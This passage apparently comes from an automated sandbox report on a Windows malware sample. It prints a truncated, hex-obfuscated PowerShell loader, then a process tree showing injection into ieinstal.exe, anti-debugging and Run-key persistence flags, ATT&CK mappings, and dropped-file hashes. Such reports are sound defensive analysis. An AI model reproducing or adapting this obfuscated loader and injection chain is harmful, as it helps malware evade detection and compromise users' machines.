'95E3D9D4DED3D0C2D4C28485918C91EAE2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FFCD0C3C2D9D0DDEC8B8BF6D4C5F5D4DDD4D6D0C5D4F7DEC3F7C4DFD2C5D8DEDFE1DED8DFC5D4C39999F7D8C2D9D3DEC6DD83839195E1D0D2D4DFD5D4C29195E7D8C3DAC2DEDCD9D4D5C2D6C3C4C1C1D480818585989D9199F7D8C2D9D3DEC6DD838291F199EAF8DFC5E1C5C3EC9D91EAE4F8DFC58283EC9D91EAE4F8DFC58283EC9D91EAE4F8DFC58283EC989199EAF8DFC5E1C5C3EC989898';.$Virksomhedsgruppe1047 $Anfgteliges6;$Selenotropy = Fishbowl22 $Virksomhedsgruppe1045 $Virksomhedsgruppe1046;$Anfgteliges7 = Fishbowl0 '95F9C8C1D4C3C1DDD0C2D8D282918C9195E3D9D4DED3D0C2D4C284859FF8DFC7DEDAD499EAF8DFC5E1C5C3EC8B8BEBD4C3DE9D918784869D9181C9828181819D9181C9858198';.$Virksomhedsgruppe1047 $Anfgteliges7;$Anfgteliges8 = Fishbowl0 '95E4C2DFDED3D3D4D5D4C2808882918C9195E3D9D4DED3D0C2D4C284859FF8DFC7DEDAD499EAF8DFC5E1C5C3EC8B8BEBD4C3DE9D9184818589868388879D9181C9828181819D9181C98598';.$Virksomhedsgruppe1047 $Anfgteliges8;$Explorations=(Get-ItemProperty -Path 'HKCU:\Campephilus134\Overwisely').afholdt;$Anfgteliges9 = Fishbowl0 '95F0DFD7D6C5D4DDD8D6D4C2918C91EAE2C8C2C5D4DC9FF2DEDFC7D4C3C5EC8B8BF7C3DEDCF3D0C2D48785E2C5C3D8DFD69995F4C9C1DDDEC3D0C5D8DEDFC298';.$Virksomhedsgruppe1047 $Anfgteliges9;$Explorations0 = Fishbowl0 'EAE2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FFCD0C3C2D9D0DDEC8B8BF2DEC1C89995F0DFD7D6C5D4DDD8D6D4C29D91819D919195F9C8C1D4C3C1DDD0C2D8D2829D9187848698';.$Virksomhedsgruppe1047 $Explorations0;$Epiglottal=$Anfgteliges.count-657;$Explorations1 = Fishbowl0 'EAE2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FFCD0C3C2D9D0DDEC8B8BF2DEC1C89995F0DFD7D6C5D4DDD8D6D4C29D918784869D9195E4C2DFDED3D3D4D5D4C28088829D9195F4C1D8D6DDDEC5C5D0DD98';.$Virksomhedsgruppe1047 $Explorations1;$Explorations2 = Fishbowl0 '95E1DEDDC8D6D0DCC58985918C91EAE2C8C2C5D4DC9FE3C4DFC5D8DCD49FF8DFC5D4C3DEC1E2D4C3C7D8D2D4C29FFCD0C3C2D9D0DDEC8B8BF6D4C5F5D4DDD4D6D0C5D4F7DEC3F7C4DFD2C5D8DEDFE1DED8DFC5D4C39999F7D8C2D9D3DEC6DD83839195E3D4C2DEDDD4DCDFD8C2D4C29195E2D4DFC2D8C5D8CBD4D5989D9199F7D8C2D9D3DEC6DD838291F199EAF8DFC5E1C5C3EC9D91EAF8DFC5E1C5C3EC9D91EAF8DFC5E1C5C3EC9D91EAF8DFC5E1C5C3EC9D91EAF8DFC5E1C5C3EC989199EAF8DFC5E1C5C3EC989898';&($Virksomhedsgruppe1047) $Explorations2;$Explorations3 = Fishbowl0 '95E1DEDDC8D6D0DCC589859FF8DFC7DEDAD49995F9C8C1D4C3C1DDD0C2D8D2829D95E4C2DFDED3D3D4D5D4C28088829D95E2D4DDD4DFDEC5C3DEC1C89D819D8198';&($Virksomhedsgruppe1047) $Explorations3#"
        6⤵
        Checks QEMU agent file
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:232
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        7⤵
        
        PID:2332
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        7⤵
        Checks QEMU agent file
        Adds Run key to start application
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
54eea9572b8a1295c4226dd63cadef78

SHA1
1572cc403c755aa7faeb0ee2e795d449e61d485f

SHA256
47b23fd79d8b2504103e2ffbd3866956a332f4c6d37625195ca0f5ab76a39ee3

SHA512
ca125313f150c27926efd0832f81964c3a6a72a42fa7a4bb9fb8579661d26b6b29ee621683b7be0c84371ce4b3791dcf9fd9da0836fb67c7dd331012dbd48809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1fb6ed3f0115e49feecee489e2b90659

SHA1
1cc9f6cf2e85e4e55fac3abfb70412b6d6106165

SHA256
3d6b3559da1b3f1202e876e9bfe8a11541a9e337b0ce72362dd21320f1f4d528

SHA512
a17773f086dd8ab8926aa9c71883bcb70c0606becb507b947a033d1f206c95dfb87fed3eaec28c282e1e0bb47798776cf6e88b3dd9004852dcec4efa141e337e

Download Submit
C:\Windows\Tasks\Sacramaese.vbs

Filesize
210KB

MD5
e9e484a3bfa78629e6b12d2cb48c4c2e

SHA1
303c2c9a33b651f1397ae6ba720f911b25a4f6c1

SHA256
f0382214714adc0d3c71fc5cd63f99f17f6a2e0a3cf45378cdaf236770793d65

SHA512
23dd1c38cf786867946231edd1a1b4f550a3fcdab75188e1a9f9d63b4364bdc71a4276960e00c825f32184f8a2ab652c11af60115a59904946a65b3d97bac9a0

Download Submit
memory/232-150-0x0000000004C70000-0x0000000004C92000-memory.dmp

Filesize
136KB

Download
memory/232-151-0x0000000004D90000-0x0000000004DF6000-memory.dmp

Filesize
408KB

Download
memory/232-161-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/232-155-0x00000000060B0000-0x00000000060CA000-memory.dmp

Filesize
104KB

Download
memory/232-159-0x0000000007BA0000-0x000000000ABC6000-memory.dmp

Filesize
48.1MB

Download
memory/232-164-0x0000000077BB0000-0x0000000077D53000-memory.dmp

Filesize
1.6MB

Download
memory/232-158-0x000000000ABD0000-0x000000000B174000-memory.dmp

Filesize
5.6MB

Download
memory/232-157-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/232-154-0x0000000007520000-0x0000000007B9A000-memory.dmp

Filesize
6.5MB

Download
memory/232-169-0x0000000077BB0000-0x0000000077D53000-memory.dmp

Filesize
1.6MB

Download
memory/232-153-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/232-152-0x0000000004E70000-0x0000000004ED6000-memory.dmp

Filesize
408KB

Download
memory/232-148-0x0000000002230000-0x0000000002266000-memory.dmp

Filesize
216KB

Download
memory/232-149-0x0000000004F00000-0x0000000005528000-memory.dmp

Filesize
6.2MB

Download
memory/232-156-0x0000000006EA0000-0x0000000006F36000-memory.dmp

Filesize
600KB

Download
memory/232-162-0x0000000007BA0000-0x000000000ABC6000-memory.dmp

Filesize
48.1MB

Download
memory/2812-170-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/2812-145-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/2812-160-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3472-142-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3472-134-0x0000015962F80000-0x0000015962FA2000-memory.dmp

Filesize
136KB

Download
memory/3472-141-0x0000015963E30000-0x00000159645D6000-memory.dmp

Filesize
7.6MB

Download
memory/3472-138-0x00007FFA02680000-0x00007FFA03141000-memory.dmp

Filesize
10.8MB

Download
memory/3472-137-0x0000015963560000-0x000001596358E000-memory.dmp

Filesize
184KB

Download
memory/3472-135-0x00007FF9FBB70000-0x00007FF9FBC25000-memory.dmp

Filesize
724KB

Download
memory/3472-136-0x0000015963240000-0x000001596325C000-memory.dmp

Filesize
112KB

Download
memory/4208-165-0x0000000000CA0000-0x0000000003CC6000-memory.dmp

Filesize
48.1MB

Download
memory/4208-166-0x0000000000CA0000-0x0000000003CC6000-memory.dmp

Filesize
48.1MB

Download
memory/4208-167-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/4208-168-0x0000000077BB0000-0x0000000077D53000-memory.dmp

Filesize
1.6MB

Download
memory/4208-171-0x0000000000CA0000-0x0000000003CC6000-memory.dmp

Filesize
48.1MB

Download
memory/4208-172-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/4208-173-0x0000000077BB0000-0x0000000077D53000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads